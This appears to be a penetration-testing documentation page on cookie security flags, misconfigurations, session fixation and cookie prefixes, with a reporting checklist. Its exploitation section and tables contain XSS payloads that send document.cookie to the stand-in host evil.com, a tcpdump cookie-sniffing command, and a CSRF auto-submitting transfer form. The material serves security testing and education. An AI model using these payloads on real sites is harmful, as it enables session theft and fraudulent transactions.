> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Cookie Security

> Cookie flags and security issues: HttpOnly, Secure, SameSite, Path, Domain, and common misconfigurations.

## Overview

Cookies carry session tokens, auth data, and preferences. Missing or misconfigured flags expose them to theft, fixation, and cross-site attacks.

***

## Check Cookies

```bash theme={"dark"}
curl -s -i https://TARGET/login -d "user=admin&pass=test" | grep -i "set-cookie"
```

### Browser DevTools

Application → Cookies → inspect flags per cookie.

***

## Cookie Flags

### HttpOnly

```
Set-Cookie: session=abc123; HttpOnly
```

| Status      | Risk                                                                                    |
| ----------- | --------------------------------------------------------------------------------------- |
| Present     | Cookie not accessible via `document.cookie`                                             |
| **Missing** | XSS can steal session: `<script>fetch('https://evil.com/?c='+document.cookie)</script>` |

### Secure

```
Set-Cookie: session=abc123; Secure
```

| Status      | Risk                                                                                           |
| ----------- | ---------------------------------------------------------------------------------------------- |
| Present     | Cookie only sent over HTTPS                                                                    |
| **Missing** | Cookie sent over HTTP → MITM interception. Attacker on same network sniffs cookie in plaintext |

### SameSite

```
Set-Cookie: session=abc123; SameSite=Strict
Set-Cookie: session=abc123; SameSite=Lax
Set-Cookie: session=abc123; SameSite=None; Secure
```

| Value       | Behavior                                   | CSRF Risk                         |
| ----------- | ------------------------------------------ | --------------------------------- |
| `Strict`    | Never sent cross-site                      | Protected                         |
| `Lax`       | Sent on top-level GET navigations          | Partial — GET-based CSRF possible |
| `None`      | Always sent (requires `Secure`)            | Vulnerable to CSRF                |
| **Missing** | Browser default (`Lax` in modern browsers) | Depends on browser                |

### Domain

```
Set-Cookie: session=abc123; Domain=.target.com
```

| Config               | Scope                             |
| -------------------- | --------------------------------- |
| `Domain=.target.com` | Cookie shared with ALL subdomains |
| No Domain attribute  | Cookie only for exact domain      |

**Risk**: Broad domain scope → XSS on any subdomain can steal cookie.

### Path

```
Set-Cookie: admin=token; Path=/admin
```

| Config        | Scope                             |
| ------------- | --------------------------------- |
| `Path=/admin` | Only sent for `/admin/*` requests |
| `Path=/`      | Sent for all paths                |

**Risk**: `Path` is NOT a security boundary — JavaScript from other paths can read it via iframe tricks.

### Expires / Max-Age

```
Set-Cookie: session=abc123; Max-Age=3600
Set-Cookie: session=abc123; Expires=Thu, 01 Jan 2026 00:00:00 GMT
```

| Config                     | Risk                                          |
| -------------------------- | --------------------------------------------- |
| No expiry (session cookie) | Deleted when browser closes                   |
| Long expiry                | Stolen cookie valid for extended period       |
| Very long (years)          | Persistent session even after password change |

***

## Vulnerability Matrix

| Missing Flag       | Attack                        |
| ------------------ | ----------------------------- |
| No HttpOnly        | XSS → `document.cookie` theft |
| No Secure          | MITM → sniff cookie over HTTP |
| SameSite=None      | CSRF attacks                  |
| Domain=.target.com | Subdomain XSS → cookie theft  |
| No expiry control  | Long-lived stolen sessions    |
| All flags missing  | All of the above              |

***

## Exploitation

### Steal Cookie via XSS (No HttpOnly)

```html theme={"dark"}
<script>
fetch('https://evil.com/steal?c=' + document.cookie);
</script>

<script>
new Image().src = 'https://evil.com/steal?c=' + document.cookie;
</script>

<img src=x onerror="fetch('https://evil.com/?c='+document.cookie)">
```

### Sniff Cookie (No Secure Flag)

```bash theme={"dark"}
# MITM on network
# Cookie sent in plaintext over HTTP
tcpdump -i eth0 -A -s 0 'tcp port 80' | grep -i "cookie"
```

### CSRF (SameSite=None)

```html theme={"dark"}
<form action="https://TARGET/transfer" method="POST">
    <input type="hidden" name="to" value="attacker">
    <input type="hidden" name="amount" value="10000">
</form>
<script>document.forms[0].submit();</script>
```

### Subdomain Cookie Theft (Broad Domain)

If `Domain=.target.com` and XSS on `blog.target.com`:

```html theme={"dark"}
<!-- On blog.target.com -->
<script>
fetch('https://evil.com/steal?c=' + document.cookie);
// Receives cookies scoped to .target.com
</script>
```

***

## Session Fixation

If application accepts session ID from URL or doesn't regenerate after login:

```
https://TARGET/login?session=ATTACKER_KNOWN_SESSION
```

Victim logs in → attacker uses known session ID.

### Prevention Check

1. Login with session X
2. After login, check if session ID changed
3. If same → session fixation vulnerable

***

## Cookie Prefixes

Modern browsers support special prefixes:

| Prefix      | Requirements                              |
| ----------- | ----------------------------------------- |
| `__Secure-` | Must have `Secure` flag, sent over HTTPS  |
| `__Host-`   | Must have `Secure`, no `Domain`, `Path=/` |

```
Set-Cookie: __Host-session=abc123; Secure; Path=/
```

`__Host-` prevents subdomain and path scoping attacks.

***

## Reporting Checklist

| Check                               | Finding                    |
| ----------------------------------- | -------------------------- |
| HttpOnly missing on session cookie  | Session hijacking via XSS  |
| Secure flag missing                 | Cookie exposure over HTTP  |
| SameSite=None or missing            | CSRF vulnerability         |
| Broad Domain scope                  | Subdomain attack surface   |
| No session regeneration after login | Session fixation           |
| Long/no expiration                  | Persistent stolen sessions |
| Cookie prefixes not used            | Missing defense-in-depth   |

***

## Quick Reference

| Flag     | Secure Value                | Risk Without          |
| -------- | --------------------------- | --------------------- |
| HttpOnly | Present                     | XSS cookie theft      |
| Secure   | Present                     | MITM sniffing         |
| SameSite | Strict or Lax               | CSRF                  |
| Domain   | Omit or exact               | Subdomain attacks     |
| Path     | `/` (not security boundary) | N/A                   |
| Expiry   | Short / session             | Persistent compromise |

***

## Sources

* [OWASP — Session Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html)
* [MDN — Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie)
* [OWASP — Testing for Cookies Attributes](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/02-Testing_for_Cookies_Attributes)
